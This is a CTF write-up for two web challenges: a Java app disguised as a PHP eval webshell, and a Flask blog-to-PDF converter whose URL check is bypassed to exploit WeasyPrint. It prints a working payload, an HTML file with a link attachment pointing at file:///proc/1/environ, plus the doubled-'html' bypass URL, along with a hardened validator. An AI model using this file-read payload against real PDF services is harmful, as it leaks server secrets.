True Is False, False Is True
Description: a Java app faking a PHP one-line webshell. In reality it is plain information disclosure: one directory scan finds it, and the flag is in /flag.
Challenge description: happily sign in, and good luck to all the masters~
Static flag: NSS{Checkin_h4v3_4_g00D_tINNe!}
What the / route shows:
```php
<?php
error_reporting(0);
header('Content-Type: text/html; charset=utf-8');
highlight_file(__FILE__);
// standard one-line webshell~
eval($_POST[1]);
?>
```
docker build -t toftoffff . && docker run -d --name=toftoffff -p 9029:9029 --rm toftoffff
Writeup:
Opening the challenge
"Do good deeds without leaving a name"? Then I, Jay17, certainly won't be doing good deeds.
You didn't actually go and try to get a shell, did you? No way, no way.
In fact this is only a one-liner faked in Java. Source:
```java
package org.nss.nss_true_boot01;

import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.ResponseBody;
import org.springframework.web.bind.annotation.RestController;

// Every handler returns a plain string body: the "PHP source" a visitor sees
// is static HTML assembled in Java, and nothing is ever evaluated.
@RestController
public class TestController {
    @GetMapping("/")
    @ResponseBody
    public String index() {
        return "<!DOCTYPE html>" +
            "<html>" +
            "<head><title>签到题题题</title></head>" +
            "<body>" +
            "<h1>" +
            "签到题,直接送大家shell了,做好事不留名,我叫Jay17(6s后页面跳转)<br>" +
            "</h1>" +
            "<script>" +
            "setTimeout(function() {" +
            " window.location.href = '/shell.php';" +
            "}, 6000);" +
            "</script>" +
            "</body>" +
            "</html>";
    }

    // GET /shell.php: imitates highlight_file() output of the PHP one-liner.
    // Note the colour of "php" after "<?": real highlight_file() would not split it.
    @GetMapping("/shell.php")
    public String shell(){
        String htmlContent = "<!DOCTYPE html>" +
            "<html>" +
            "<body>" +
            "<code><span style=\"color: #000000\">" +
            "<span style=\"color: #0000BB\"><?</span><span style=\"color: #DD0000\">php</span><br />" +
            "error_reporting</span><span style=\"color: #007700\">(</span><span style=\"color: #0000BB\">0</span><span style=\"color: #007700\">);" +
            "<br /></span><span style=\"color: #0000BB\">header</span><span style=\"color: #007700\">(</span><span style=\"color: #DD0000\">" +
            "'Content-Type: text/html; charset=utf-8'</span><span style=\"color: #007700\">);" +
            "<br /></span><span style=\"color: #0000BB\">highlight_file</span><span style=\"color: #007700\">(</span><span style=\"color: #0000BB\">" +
            "__FILE__</span><span style=\"color: #007700\">);" +
            "<br /><br /></span><span style=\"color: #FF8000\">//标准一句话木马~" +
            "<br /></span><span style=\"color: #007700\">eval(</span><span style=\"color: #0000BB\">$_POST</span><span style=\"color: #007700\">[" +
            "</span><span style=\"color: #0000BB\">1</span><span style=\"color: #007700\">]);" +
            "<br /></span><span style=\"color: #0000BB\">?></span>" +
            "</span>" +
            "</code>" +
            "</body>" +
            "</html>";
        return htmlContent;
    }

    // POST /shell.php: the request body is ignored; the same page comes back.
    @PostMapping("/shell.php")
    public String shellhhhh(){
        String htmlContent = "<!DOCTYPE html>" +
            "<html>" +
            "<body>" +
            "<code><span style=\"color: #000000\">" +
            "<span style=\"color: #0000BB\"><?</span><span style=\"color: #DD0000\">php</span><br />" +
            "error_reporting</span><span style=\"color: #007700\">(</span><span style=\"color: #0000BB\">0</span><span style=\"color: #007700\">);" +
            "<br /></span><span style=\"color: #0000BB\">header</span><span style=\"color: #007700\">(</span><span style=\"color: #DD0000\">" +
            "'Content-Type: text/html; charset=utf-8'</span><span style=\"color: #007700\">);" +
            "<br /></span><span style=\"color: #0000BB\">highlight_file</span><span style=\"color: #007700\">(</span><span style=\"color: #0000BB\">" +
            "__FILE__</span><span style=\"color: #007700\">);" +
            "<br /><br /></span><span style=\"color: #FF8000\">//标准一句话木马~" +
            "<br /></span><span style=\"color: #007700\">eval(</span><span style=\"color: #0000BB\">$_POST</span><span style=\"color: #007700\">[" +
            "</span><span style=\"color: #0000BB\">1</span><span style=\"color: #007700\">]);" +
            "<br /></span><span style=\"color: #0000BB\">?></span>" +
            "</span>" +
            "</code>" +
            "真是shell我能给你?" +
            "</body>" +
            "</html>";
        return htmlContent;
    }

    // The unlinked route a directory scan turns up.
    @GetMapping("/flag")
    public String flag(){
        return "真是shell我能给你?不过flag真给你,师傅们玩的愉快~:NSS{Checkin_h4v3_4_g00D_tINNe!}";
    }
}
```
How to break it? I did leave a hint in the fake one-liner: I deliberately got the syntax-highlighting colours wrong.
Besides that, the flag route shows up as soon as you scan for routes.
CSDN_To_PDF V1.2
Description: a vulnerability in Python's WeasyPrint that has appeared before, in [FireshellCTF2020]URL TO PDF (BUU) and in the 2023 Yangcheng Cup finals (environment not public). I modified it to raise the difficulty a little; the bypass starts from a flaw in the code logic.
Hint: WeasyPrint; the string html is filtered out by replacement.
Challenge description: my personal CSDN blog-to-PDF converter from a few years ago.
Source:
```python
from flask import Flask, request, jsonify, make_response, render_template, flash, redirect, url_for
import re
from flask_weasyprint import HTML, render_pdf
import os

app = Flask(__name__)

# Only checks that the string *starts* like a URL; the path may contain anything.
URL_REGEX = re.compile(
    r'http(s)?://'
    r'(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+'
)


def is_valid_url(url):
    if not URL_REGEX.match(url):
        return False
    # A substring check, not a hostname check.
    if "blog.csdn.net" not in url:
        return False
    return True


@app.route('/', methods=['GET', 'POST'])
def CsdnToPdf():
    if request.method == 'POST':
        url = request.form.get('url')
        # "html" is removed once, before validation; what remains is fetched.
        url = url.replace("html", "")
        if is_valid_url(url):
            try:
                html = HTML(url=url)
                pdf = html.write_pdf()
                response = make_response(pdf)
                response.headers['Content-Type'] = 'application/pdf'
                response.headers['Content-Disposition'] = 'attachment; filename=output.pdf'
                return response
            except Exception as e:
                return f'Error generating PDF', 500
        else:
            # Echoes the post-replacement URL back to the user.
            return f'Invalid URL! Target web address: ' + url
    else:
        return render_template("index.html"), 200


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8080)
```
docker build -t csdntopdf . && docker run -d -p 9030:8080 --name csdntopdf -e FLAG=NSSCTF{test_flag} --rm double_pickle
Writeup:
Opening the challenge:
Not sure whether the source needs to be given out; forget it, I won't give it, go do it black-box, the hints are all there.
The hints are as follows; whether you spot them is up to you:
1. If the URL does not meet the requirements, the response is "Invalid URL! Target web address: xxxxx", from which you can notice that I replace the string html with nothing; doubling it up (writing it so that one removal leaves html behind) gets past that.
2. The challenge mentions a CSDN blog PDF converter, so the URL must contain blog.csdn.net. That looks impossible to bypass, but look at the source and you will understand. I gave a hint in the front-end source: my CSS file is loaded from http://120.46.41.173/Jay17/blog.csdn.net/templates/index.css, so there is a folder on the server named blog.csdn.net; bypass it that way. Masters with ideas might even find the source in the same directory on my VPS~
3. The function is converting to PDF and the back end is Python, so it is not hard to think of WeasyPrint, a Python HTML and CSS rendering engine that turns web pages into PDF documents and aims to support the web standards for printing.
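As an added example (my own code, not the challenge's), the validator from the source is reproduced next to a hardened version that parses the URL as it will actually be fetched, compares the hostname exactly, and gates the scheme of sub-resources too. The sample inputs are constructed from the two hints above, with 203.0.113.5 standing in for the VPS address; the `url_fetcher` remark refers to WeasyPrint's hook for sub-resource loading and is not wired up here.

```python
import re
from urllib.parse import urlsplit

# The challenge's own regex, copied so the flawed check can be reproduced.
URL_REGEX = re.compile(
    r'http(s)?://'
    r'(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+'
)

def challenge_check(url):
    """Mirror of CsdnToPdf: strip 'html', validate the remainder, fetch it.
    Returns (accepted, url_that_would_be_fetched)."""
    stripped = url.replace("html", "")
    accepted = bool(URL_REGEX.match(stripped)) and "blog.csdn.net" in stripped
    return accepted, stripped

ALLOWED_HOSTS = {"blog.csdn.net"}       # exact hostnames, never substrings

def hardened_accepts(url):
    """Parse the URL exactly as it will be fetched and compare the hostname.
    No lossy replace before the check, no substring match, no odd schemes."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False                     # file://, ftp:// ... are not web pages
    if parts.username is not None or parts.password is not None:
        return False                     # http://user@host/ forms are rejected
    return (parts.hostname or "").lower() in ALLOWED_HOSTS

def subresource_allowed(url):
    """Gate for URLs the renderer pulls in while building the PDF (CSS, images,
    <link rel="attachment">). In WeasyPrint this belongs in a url_fetcher
    wrapper; validating only the top-level URL does not cover these."""
    return urlsplit(url).scheme in ("http", "https")

# Constructed samples: a legitimate blog URL, the two hint bypasses, and a
# look-alike host that a substring check would accept.
SAMPLES = [
    "https://blog.csdn.net/someone/article/details/1.html",
    "http://203.0.113.5/Jay17/blog.csdn.net/link.hthtmlml",
    "http://203.0.113.5/Jay17/blog.csdn.net/link.html",
    "http://blog.csdn.net.attacker.example/page",
]

if __name__ == "__main__":
    for u in SAMPLES:
        print(f"{u}\n  challenge={challenge_check(u)}  hardened={hardened_accepts(u)}")
    print("file:///proc/1/environ as sub-resource ->",
          subresource_allowed("file:///proc/1/environ"))
```

Note that the original replace also mangles legitimate input: a genuine .html article URL is accepted but fetched with its extension cut off.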
For the original challenge you can read y4✌'s writeup: [BUUCTF][FireshellCTF2020]URL TO PDF-CSDN博客
First, probe the vulnerability:
http://120.46.41.173:9023/blog.csdn.net
File test.html on the VPS:
```html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
</head>
<body>
<link rel="attachment" href="file:///proc/1/environ">
</body>
</html>
```
The way Python WeasyPrint is exploited in general:
payload:
http://vps-ip/link.html
The way this challenge is exploited:
payload:
http://120.46.41.173/Jay17/blog.csdn.net/link.hthtmlml
After getting the PDF: binwalk -e <filename>
Challenge test: